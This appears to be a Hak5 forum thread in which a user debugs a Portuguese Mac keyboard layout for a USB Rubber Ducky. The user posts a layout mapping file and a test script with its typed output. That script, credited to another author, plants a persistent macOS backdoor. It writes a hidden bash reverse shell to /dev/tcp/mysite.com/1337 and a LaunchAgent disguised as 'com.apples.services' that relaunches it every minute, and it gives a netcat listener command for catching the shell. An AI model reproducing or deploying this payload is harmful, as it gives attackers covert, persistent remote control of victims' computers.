Jump to content
Hak5 Forums
Sign in to follow this  
wildlifechorus

Rubber Ducky Emulator/Simulator

Recommended Posts

Hey guys,

I'm trying to map a pt_PT (Mac) keyboard, however every time I want to test my mappings I have to unplug the SD card, stick it into the rubber ducky and run it.

Is there a better way? Like a Emulator/Simulator?

I think I'm almost there, but it's a pain in the ass.

Best,

Share this post


Link to post
Share on other sites

Here's what I have so far:

 

ptosx.properties

Quote

// KEYS

MODIFIERKEY_CTRL = 0x01
MODIFIERKEY_SHIFT = 0x02
MODIFIERKEY_ALT = 0x04
MODIFIERKEY_GUI = 0x08
MODIFIERKEY_LEFT_CTRL = 0x01
MODIFIERKEY_LEFT_SHIFT = 0x02
MODIFIERKEY_LEFT_ALT = 0x04
MODIFIERKEY_LEFT_GUI = 0x08
MODIFIERKEY_RIGHT_CTRL = 0x10
MODIFIERKEY_RIGHT_SHIFT= 0x20
MODIFIERKEY_RIGHT_ALT = 0x40
MODIFIERKEY_RIGHT_GUI = 0x80

KEY_A = 0
KEY_B = 11
KEY_C = 8
KEY_D = 2
KEY_E = 14
KEY_F = 9
KEY_G = 5
KEY_H = 4
KEY_I = 34
KEY_J = 38
KEY_K = 40
KEY_L = 37
KEY_M = 46
KEY_N = 45
KEY_O = 31
KEY_P = 35
KEY_Q = 12
KEY_R = 15
KEY_S = 1
KEY_T = 17
KEY_U = 32
KEY_V = 9
KEY_W = 13
KEY_X = 7
KEY_Y = 16
KEY_Z = 6

KEY_1 = 18
KEY_2 = 19
KEY_3 = 20
KEY_4 = 21
KEY_5 = 23
KEY_6 = 22
KEY_7 = 26
KEY_8 = 28
KEY_9 = 25
KEY_0 = 29

KEY_ENTER = 36
KEY_ESC = 53
KEY_BACKSPACE = 51
KEY_TAB = 48
KEY_SPACE = 49
KEY_MINUS = 44
KEY_ARROW = 50
KEY_ACCENT = 30

KEY_QUOTE = 27
KEY_COMMA = 43
KEY_PERIOD = 47
KEY_SLASH = 42
KEY_PLUS = 24
KEY_TILDE = 39

KEY_RIGHT = 124
KEY_LEFT = 123
KEY_DOWN = 125
KEY_UP = 126

KEY_LEFT_CTRL = 0xE0
KEY_LEFT_SHIFT = 0xE1
KEY_LEFT_ALT = 0xE2
KEY_LEFT_GUI = 0xE3
KEY_COMMAND = 0xE3
KEY_RIGHT_CTRL = 0xE4
KEY_RIGHT_SHIFT= 0xE5
KEY_RIGHT_ALT = 0xE6
KEY_RIGHT_GUI = 0xE7

// ASCII

// 32
ASCII_20 = KEY_SPACE
// 33 ! 49 1
ASCII_21 = KEY_1, MODIFIERKEY_SHIFT
ASCII_31 = KEY_1
// 34 " 50 2
ASCII_22 = KEY_2, MODIFIERKEY_SHIFT
ASCII_32 = KEY_2
// 35 # 51 3
ASCII_23 = KEY_3, MODIFIERKEY_SHIFT
ASCII_33 = KEY_3
// 36 $ 52 4
ASCII_24 = KEY_4, MODIFIERKEY_SHIFT
ASCII_34 = KEY_4
// 37 % 53 5
ASCII_25 = KEY_5, MODIFIERKEY_SHIFT
ASCII_35 = KEY_5
// 38 & 35 6
ASCII_26 = KEY_6, MODIFIERKEY_SHIFT
ASCII_36 = KEY_6
// 47 SLASH 55 7
ASCII_2F = KEY_7, MODIFIERKEY_SHIFT
ASCII_37 = KEY_7
// 40 ( 55 8
ASCII_28 = KEY_8, MODIFIERKEY_SHIFT
ASCII_38 = KEY_8
// 41 ) 57 9
ASCII_29 = KEY_9, MODIFIERKEY_SHIFT
ASCII_39 = KEY_9
// 61 = 48 0
ASCII_3D = KEY_0, MODIFIERKEY_SHIFT
ASCII_30 = KEY_0
// 39 ' 63 ?
ASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT
ASCII_27 = KEY_MINUS
// 42 * 43 +
ASCII_2A = KEY_PLUS, MODIFIERKEY_SHIFT
ASCII_2B = KEY_PLUS
// 44 , 59 ;
ASCII_2C = KEY_COMMA
ASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT
// 45 - 95 _
ASCII_2D = KEY_SLASH,
ASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT
// 46 . 58 :
ASCII_2E = KEY_PERIOD
ASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT
// 60 < 62 >
ASCII_3C = KEY_TILDE
ASCII_3E = KEY_TILDE, MODIFIERKEY_SHIFT
// 64 @
ASCII_40 = KEY_2, MODIFIERKEY_RIGHT_ALT
// 65 A
ASCII_41 = KEY_A, MODIFIERKEY_SHIFT
// 66 B
ASCII_42 = KEY_B, MODIFIERKEY_SHIFT
// 67 C
ASCII_43 = KEY_C, MODIFIERKEY_SHIFT
// 68 D
ASCII_44 = KEY_D, MODIFIERKEY_SHIFT
// 69 E
ASCII_45 = KEY_E, MODIFIERKEY_SHIFT
// 70 F
ASCII_46 = KEY_F, MODIFIERKEY_SHIFT
// 71 G
ASCII_47 = KEY_G, MODIFIERKEY_SHIFT
// 72 H
ASCII_48 = KEY_H, MODIFIERKEY_SHIFT
// 73 I
ASCII_49 = KEY_I, MODIFIERKEY_SHIFT
// 74 J
ASCII_4A = KEY_J, MODIFIERKEY_SHIFT
// 75 K
ASCII_4B = KEY_K, MODIFIERKEY_SHIFT
// 76 L
ASCII_4C = KEY_L, MODIFIERKEY_SHIFT
// 77 M
ASCII_4D = KEY_M, MODIFIERKEY_SHIFT
// 78 N
ASCII_4E = KEY_N, MODIFIERKEY_SHIFT
// 79 O
ASCII_4F = KEY_O, MODIFIERKEY_SHIFT
// 80 P
ASCII_50 = KEY_P, MODIFIERKEY_SHIFT
// 81 Q
ASCII_51 = KEY_Q, MODIFIERKEY_SHIFT
// 82 R
ASCII_52 = KEY_R, MODIFIERKEY_SHIFT
// 83 S
ASCII_53 = KEY_S, MODIFIERKEY_SHIFT
// 84 T
ASCII_54 = KEY_T, MODIFIERKEY_SHIFT
// 85 U
ASCII_55 = KEY_U, MODIFIERKEY_SHIFT
// 86 V
ASCII_56 = KEY_V, MODIFIERKEY_SHIFT
// 87 W
ASCII_57 = KEY_W, MODIFIERKEY_SHIFT
// 88 X
ASCII_58 = KEY_X, MODIFIERKEY_SHIFT
// 89 Y
ASCII_59 = KEY_Y, MODIFIERKEY_SHIFT
// 90 Z
ASCII_5A = KEY_Z, MODIFIERKEY_SHIFT
// 91 [ 93 ]
ASCII_5B = KEY_8, MODIFIERKEY_RIGHT_ALT
ASCII_5D = KEY_9, MODIFIERKEY_RIGHT_ALT
// 94 ^ 126 ~
ASCII_5E = KEY_TILDE, MODIFIERKEY_SHIFT
ASCII_7E = KEY_TILDE
// 96 `
ASCII_60 = KEY_ACCENT, MODIFIERKEY_SHIFT
// 97 a
ASCII_61 = KEY_A
// 98 b
ASCII_62 = KEY_B
// 99 c
ASCII_63 = KEY_C
// 100 d
ASCII_64 = KEY_D
// 101 e
ASCII_65 = KEY_E
// 102 f
ASCII_66 = KEY_F
// 103 g
ASCII_67 = KEY_G
// 104 h
ASCII_68 = KEY_H
// 105 i
ASCII_69 = KEY_I
// 106 j
ASCII_6A = KEY_J
// 107 k
ASCII_6B = KEY_K
// 108 l
ASCII_6C = KEY_L
// 109 m
ASCII_6D = KEY_M
// 110 n
ASCII_6E = KEY_N
// 111 o
ASCII_6F = KEY_O
// 112 p
ASCII_70 = KEY_P
// 113 q
ASCII_71 = KEY_Q
// 114 r
ASCII_72 = KEY_R
// 115 s
ASCII_73 = KEY_S
// 116 t
ASCII_74 = KEY_T
// 117 u
ASCII_75 = KEY_U
// 118 v
ASCII_76 = KEY_V
// 119 w
ASCII_77 = KEY_W
// 120 x
ASCII_78 = KEY_X
// 121 y
ASCII_79 = KEY_Y
// 122 z
ASCII_7A = KEY_Z
// 123 { 125 }
ASCII_7B = KEY_7, MODIFIERKEY_RIGHT_ALT
ASCII_7D = KEY_0, MODIFIERKEY_RIGHT_ALT
// 124 | 92
ASCII_7C = KEY_SLASH, MODIFIERKEY_SHIFT
ASCII_5C = KEY_SLASH
// 127
ASCII_7F = KEY_BACKSPACE

script.txt

Quote

REM Patrick Mosca
REM A simple script for creating a persistent backdoor on OSX.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
GUI SPACE
STRING sublime
DELAY 500
ENTER
DELAY 500
STRING mkdir ~/Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > ~/Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x ~/Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir ~/Library/LaunchAgents
ENTER
DELAY 200
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200

Output:

Quote

mkdir ¨/Library/.hidden
echo '#!/bin/bash
bash -i >& /dev/tcp/mysite.com/1337 0>&1
wait' > ¨/Library/.hidden/connect.sh
chmod ux ¨/Library/.hidden/connect.sh
mkdir ¨/Library/LaunchAgents
echo '<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apples.services</string>
<key>ProgramArguments</key>
<array>
<string>/bin/sh</string>
<string>'$HOME'/Library/.hidden/connect.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>60</integer>
<key>AbandonProcessGroup</key>
<true/>
</dict>
</plist>' > ¨/Library/LaunchAgents/com.apples.services.plist
chmod 600 ¨/Library/LaunchAgents/com.apples.services.plist
launchctl load ¨/Library/LaunchAgents/com.apples.services.plist
'

I'm missing a couple of chars: +, ~ are the most important. When I scan for my + and ~ keys I get these keycodes: 24, 29.

Could someone help?

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×